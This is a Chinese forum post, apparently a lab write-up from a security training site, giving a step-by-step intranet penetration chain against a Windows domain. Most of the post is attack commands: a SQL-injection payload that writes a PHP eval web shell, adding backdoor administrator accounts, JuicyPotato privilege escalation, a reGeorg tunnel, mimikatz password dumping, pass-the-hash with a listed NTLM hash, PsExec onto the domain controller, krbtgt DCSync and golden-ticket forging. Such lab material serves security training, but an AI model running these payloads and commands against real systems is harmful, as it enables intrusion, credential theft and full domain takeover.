新手内网渗透流程

yangroupaomo   ·   发表于 2021-01-18 23:17:01   ·   技术文章投稿区

1、通过sql注入,写入一句话木马

id=7 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'c:/phpstudy/www/125.php'
函数(相当于数据库备份):
into outfile、into dumpfile

2、菜刀、蚁剑连接

cmd基本命令
net user 账号 密码 /add (新建账号密码)
net user 账号 密码 (修改账号密码)
Whoami (查看用户权限)
netstat -ano (查看本机开放的端口)
Tasklist (查看本机运行的程序[类似于任务管理器])
Systeminfo (查看计算机信息)
net localgroup administrators /add (提权到管理员组)

3、利用Window的漏洞(最常见手法)

查看windows打了什么补丁,然后去网上找存在什么样的漏洞,然后找对应的提权工具。
网址: https://bugs.hacking8.com/tiquan/

4、烂土豆插件提权

原版:JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
魔改:JuicyPotato.exe -p “whomai”

5、提权步骤

JuicyPotato.exe -p “whomai”
JuicyPotato.exe -p “net user 账号 密码 /add”
JuicyPotato.exe -p “net localgroup administrators 账号 /add”

6、利用reGeorgSocksProxy.py文件进行内网访问,(这里需要python2环境支持)

python reGeorgSocksProxy.py -l 127.0. 0.1 -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/110.php

7、打开Proxifier汉化版,设置代理服务器和代理规则

代理服务器设置为127.0.0.1,端口为10086
访问规则设置为mstsc.exe,(标识只监视远程桌面连接的流量)

8、利用新建账号远程访问内网

进入内网,打开猕猴桃软件,进行提权,获取管理员密码
privilege::debug (提升权限)
Log (生成日志)
sekurlsa::logonpasswords (抓取密码)

9、利用查出来的管理员账号密码,访问内网机器10.0.1.8

登录内网10.0.1.8,在继续进行猕猴桃提权。
privilege::debug (提升权限)
Log (生成日志)
sekurlsa::logonpasswords (抓取密码)
发现生成密码为加密的
利用cmd指令systeminfo,查看本机信息,发现本机在(zkaq.cn)域控机器范围内

10、接着域控提权。

上猕猴桃
sekurlsa::logonpasswords (抓取密码)
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
(登陆用户 域地址 ntlm加密值)
dir \dc.zkaq.cn\c$【查看域控C盘】

11、利用PsExec.exe在cmd窗口进行域控提权

PsExec.exe \\dc.zkaq.cn cmd ([他会去调用域控主机的cmd])

12、接着又是新建一个域控主机的账号

net user 账号 密码 /add
net localgroup administrators 账号 /add
在来查询域控主机IP地址10.0.1.6

13、接着远程登录域控主机

在上猕猴桃
lsadump::dcsync /user:krbtgt 获取krbtgt的密码 [mimikatz 会模拟域控,向目标域控请求账号密码信息]
获得sid和krbtgt的值。就可以退出域控主机了,但还必须处在内网中。
返回10.0.1.8网络。
在猕猴桃处制作黄金票据:
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi
[制作票据] (注意不要502)

kerberos::ptt administrator.kiribi [加载票据]
就可以访问域控了,
只要黄金票据存在,
以后就可以直接[加载票据],进行PsExec.exe在cmd窗口进行域控提权,就遨游内网。

用户名金币积分时间理由
veek 30.00 0 2021-01-25 17:05:10 有图了再给你加钱

打赏我,让我更有动力~

0 Reply   |  Until 2021-1-18 | 1092 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.